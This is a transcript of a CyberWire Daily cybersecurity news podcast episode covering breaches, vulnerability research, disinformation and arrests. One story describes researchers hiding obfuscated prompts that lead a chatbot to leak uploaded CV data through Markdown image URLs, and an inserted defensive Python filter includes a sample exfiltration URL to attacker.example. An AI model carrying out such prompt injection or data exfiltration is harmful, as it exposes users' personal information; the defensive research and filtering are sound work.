The CyberWire Daily Podcast 10.21.24
Ep 2173 | 10.21.24

On the run, caught on arrival.

Transcript

An alleged Australian scammer wanted by the FBI gets nabbed in Italy. The Internet Archive has been breached again. Researchers discover vulnerabilities in encrypted cloud storage platforms. Cisco confirms stolen files but insists it’s not a data breach. A Chinese disinformation group targets Senator Marco Rubio. Malicious chatbot prompts can hide inside harmless ones. The DoD wants to offer senior cyber executives part-time roles as military reservists. Six years out, the specter of Spectre remains. Russian prosecutors seek prison for REvil operators. Guest Pete Newell, Founder and CEO of BMNT, talks with N2K's Brandon Karpf about challenges associated with technology adoption and change in the DoD. Microsoft uses clever deception to reel in phishers. 

Today is Monday October 21st 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

An alleged Australian scammer wanted by the FBI gets nabbed in Italy. 

An Australian man, wanted by the FBI for a $46 million online scam, was arrested in Milan, Italy. This 44-year-old, described by authorities as an “Italo-Australian,” had been dodging law enforcement for over three years. Interpol tipped off Italian border police, who nabbed him at Malpensa Airport as he got off a flight from Singapore. The scam itself? Classic tech support fraud, but with a nasty twist. Victims—mostly elderly folks—were duped into thinking their computers were compromised. A fake error message popped up, telling them to call for help. Once on the line, they were convinced to fork over money for “technical assistance” that, surprise, didn’t exist. The FBI’s investigation estimated the gang’s ill-gotten gains at around $31 million. Authorities are now working on extraditing the suspect to the U.S., where he’ll face justice for his part in this global scheme.

The Internet Archive has been breached again. 

The Internet Archive has been breached again, this time through their Zendesk email support platform. The hacker, who had warned the Archive weeks earlier about exposed GitLab authentication tokens, accessed over 800,000 support tickets, including requests for site removals from the Wayback Machine. Victims may have shared personal identification in those tickets, which the hacker could now access. This comes after a previous breach where 33 million users’ data was stolen through the same GitLab token, which had been exposed for nearly two years. Despite repeated warnings from security researchers, the Internet Archive failed to rotate many of the compromised API keys. The hacker claims they stole 7TB of data, although no proof was provided. The breach wasn’t politically motivated or financially driven but was carried out for “cyber street cred,” boosting the hacker’s reputation among others in the data breach community. 

Researchers discover vulnerabilities in encrypted cloud storage platforms. 

Researchers from ETH Zurich have discovered security vulnerabilities in several end-to-end encrypted (E2EE) cloud storage platforms, including Sync, pCloud, Icedrive, Seafile, and Tresorit, which together serve over 22 million users. The research highlights flaws that could allow attackers, especially those controlling malicious servers, to access, modify, or inject files into users’ storage. These issues undermine the platforms’ claims of complete data protection.

The vulnerabilities varied by platform. Sync had issues with key material and file tampering, while pCloud and Icedrive also struggled with unauthorized key manipulation. Seafile was vulnerable to password brute-forcing, and Tresorit, though faring better, still had weaknesses in key authentication.

Despite notifying the companies, not all have responded promptly. Sync claims to be addressing the flaws, while Icedrive has opted not to fix them. This research serves as a reminder that even encrypted platforms aren’t foolproof and highlights the importance of staying vigilant with cloud storage security.

Cisco confirms stolen files but insists it’s not a data breach.  

Cisco confirmed that some of its files were stolen after a hacker, known as IntelBroker, offered company data for sale on a cybercrime forum. On October 14, IntelBroker claimed to have accessed various sensitive assets, including source code, credentials, API tokens, and documents from companies like Microsoft, AT&T, and Verizon. The hacker also shared screenshots to back up these claims. Cisco launched an investigation and stated that, as of now, its systems were not breached. The stolen data came from a public-facing DevHub environment, a resource center for customers. Cisco noted that some files not meant for public download were exposed, but no sensitive personal or financial information was detected so far. In response, Cisco has disabled access to the affected site and continues to investigate. IntelBroker has a history of targeting major companies, though the impact of this breach may be limited.

A Chinese disinformation group targets Senator Marco Rubio. 

Chinese disinformation group Spamouflage has renewed its attacks on Republican Senator Marco Rubio of Florida, according to researchers at Clemson University’s Media Forensics Lab. The group first targeted Rubio during his 2022 re-election campaign, flooding social media with pro-Rubio posts to drown out legitimate content. But in mid-September 2024, Spamouflage returned, testing new tactics with more sophisticated anti-Rubio messaging.

Researchers believe Rubio is a “canary in the coal mine,” and China may be using these new techniques for future campaigns. The posts, shared on platforms like X (formerly Twitter), Reddit, and Medium, appear more authentic, using hijacked accounts and possibly AI-generated content.

Senator Rubio, a vocal critic of China, did not directly address the campaign but warned that China is becoming more aggressive in its efforts to shape American opinion. Experts caution that we shouldn’t underestimate China’s disinformation efforts, as they become more refined and dangerous.

Malicious chatbot prompts can hide inside harmless ones. 

Security researchers have found a way to use AI chatbots for sneaky attacks that could expose personal details. They developed an algorithm that hides malicious prompts inside seemingly harmless ones, tricking users into sharing sensitive information, like their CV data, with attackers. The researchers uploaded CVs into chatbot conversations, and the bot sent back the personal information in the file.

Earlence Fernandes from UC San Diego, who worked on the research, compared the attack to malware. What’s fascinating here is that the malicious behavior can be triggered by a short, gibberish-like prompt without raising the user’s suspicions.

In response, Mistral AI quickly patched the vulnerability, stopping the chatbot from loading external URLs via Markdown syntax. Fernandes believes this may be one of the first times an adversarial prompt led to an actual fix.

Experts advise users to be cautious about what personal data they share with AI bots and to avoid using unverified prompts from the internet.
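The patch described above blocks the chatbot client from fetching external URLs written in Markdown, which closes the channel through which the leaked CV fields left the conversation. As an added illustration (not code from the episode, from Mistral, or from the researchers), here is a response-side filter of that kind: it removes image references to hosts outside an allowlist, since a client renders those with no user action, and defangs links to such hosts so nothing auto-loads. The sample reply, the hosts attacker.example and docs.example.org, and the allowlist are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample assistant reply: an image reference whose query string
# carries fields from the user's CV (hypothetical host), plus a benign link.
SAMPLE_REPLY = (
    "Thanks, I reviewed your CV.\n"
    "![summary](https://attacker.example/log?name=Jane%20Doe&phone=555-0100)\n"
    "Here is a [reference](https://docs.example.org/style-guide).\n"
)

# Assumption: the deployment trusts only these hosts for auto-loaded content.
ALLOWED_HOSTS = {"docs.example.org"}

# ![alt](url "title") and [text](url "title"); the lookbehind keeps the link
# pattern from matching the tail of an image reference.
MD_IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
MD_LINK_RE = re.compile(r"(?<!!)\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def is_external(url):
    """True for an http(s) URL whose host is not on the allowlist."""
    p = urlparse(url)
    return p.scheme in ("http", "https") and p.hostname not in ALLOWED_HOSTS


def sanitize_markdown(text):
    """Return (clean_text, findings).

    Images pointing at non-allowlisted hosts are dropped entirely, because a
    Markdown renderer fetches them without any click. Links to such hosts are
    turned into plain text with the scheme defanged, so they never auto-load
    but the reviewer can still see where the reply tried to send the user.
    findings lists (kind, url) for every reference that was altered.
    """
    findings = []

    def drop_image(m):
        alt, url = m.group(1), m.group(2)
        if is_external(url):
            findings.append(("image", url))
            return f"[image removed: {alt}]"
        return m.group(0)

    def defang_link(m):
        label, url = m.group(1), m.group(2)
        if is_external(url):
            findings.append(("link", url))
            return f"{label} ({url.replace('://', '[:]//')})"
        return m.group(0)

    text = MD_IMAGE_RE.sub(drop_image, text)
    text = MD_LINK_RE.sub(defang_link, text)
    return text, findings
```

Any non-empty findings list is also a detection signal worth logging: a reply that tries to load a non-allowlisted URL right after a document upload is exactly the pattern the story describes.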

The DoD wants to offer senior cyber executives part-time roles as military reservists.

The U.S. Defense Department is looking to tap into Silicon Valley’s tech talent by offering senior executives part-time roles as military reservists. These tech pros, like chief technology officers, would serve in high-ranking positions and be called in for short-term projects in areas like cybersecurity and data analytics. Brynt Parmeter, the Defense Department’s chief talent management officer, is spearheading the effort, aiming to bring dozens of tech professionals on board by next September, with plans to grow the program significantly over the next few years.

This initiative marks a shift in Silicon Valley’s relationship with the military, as tech companies increasingly see national security opportunities as beneficial. Parmeter hopes to place these tech experts in roles equivalent to major or lieutenant colonel in the Army and Air Force Reserves. The goal is to strengthen the military’s capabilities by leveraging private-sector expertise, without pulling these tech pros away from their keyboards and into combat.

Six years out, the specter of Spectre remains. 

Six years after the Spectre processor design flaws were first revealed, researchers are still finding vulnerabilities. Johannes Wikner and Kaveh Razavi from ETH Zurich uncovered a new cross-process Spectre attack that bypasses security defenses like Address Space Layout Randomization (ASLR) on recent Intel processors. This attack allows hackers to leak sensitive data, such as root password hashes.

Spectre attacks exploit speculative execution, a performance feature in modern CPUs, to access out-of-bounds memory, revealing secrets like passwords. Despite Intel’s microcode patch (INTEL-SA-00982) in March 2024, vulnerabilities remain in Intel’s 12th to 14th-gen Core processors and 5th and 6th-gen Xeon chips. AMD Zen 1 and Zen 2 processors are also affected, with Linux users at risk.

Russian prosecutors seek prison for REvil operators. 

Russian prosecutors are seeking prison sentences of up to 6.5 years for four individuals linked to the notorious hacking group REvil. The group, responsible for major ransomware attacks, was shut down in 2021, with 14 members arrested by Russian authorities. While 14 were detained, only eight have faced charges related to illegal financial transactions in a Moscow court. The defense argues that prosecutors have yet to provide concrete evidence.

Key suspects, including alleged leader Daniil Puzyrevsky, face additional charges for unauthorized access to computer information. REvil became infamous for targeting high-profile individuals and companies, such as Lady Gaga and the U.S. software provider Kaseya. Notably, Russia’s crackdown on REvil followed U.S. pressure, with President Biden urging action against cybercriminals affecting American businesses. During the arrests, authorities seized millions in cash, cryptocurrency, and luxury items from the suspects.


Coming up, we’ve got BMNT Founder and CEO Pete Newell and N2K's Brandon Karpf discussing the challenges associated with technology adoption and change in the DoD.

We’ll be right back.

Welcome back.

Microsoft uses clever deception to reel in phishers. 

And finally, Microsoft is getting clever with phishing attackers, using a bit of “spy-vs-spy” deception to throw them off their game. At the BSides Exeter conference, Ross Bevington, who dubs himself Microsoft’s “Head of Deception,” revealed how the tech giant lures cybercriminals into fake environments designed to look like real Azure tenants. These honeypots, filled with fake user accounts, emails, and activity, trick attackers into thinking they’ve struck gold—when in reality, they’re just playing in Microsoft’s sandbox.

Once the bad guys log in using phishing kits or stolen credentials, Microsoft tracks their every move. It’s like handing them the keys to a mansion, only to let them wander aimlessly while you watch from the security cameras. In 5% of cases, the attackers fall for it, wasting days hunting for sensitive data that doesn’t exist. Meanwhile, Microsoft collects valuable intel—IP addresses, phishing methods, and behavior patterns.

Bevington’s team is fighting phishing at scale, with Microsoft monitoring about 25,000 phishing sites daily. For around 20% of these sites, they feed in honeypot credentials, and for the unlucky hackers who take the bait, Microsoft starts logging everything.

And they don’t stop there—they slow the entire experience down, dragging out the attackers’ time in the fake environment for up to 30 days. The result? Attackers waste time, Microsoft gains crucial intelligence, and security teams around the world get better defenses. It’s a win-win… well, unless you’re the hacker.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.


We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.


This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.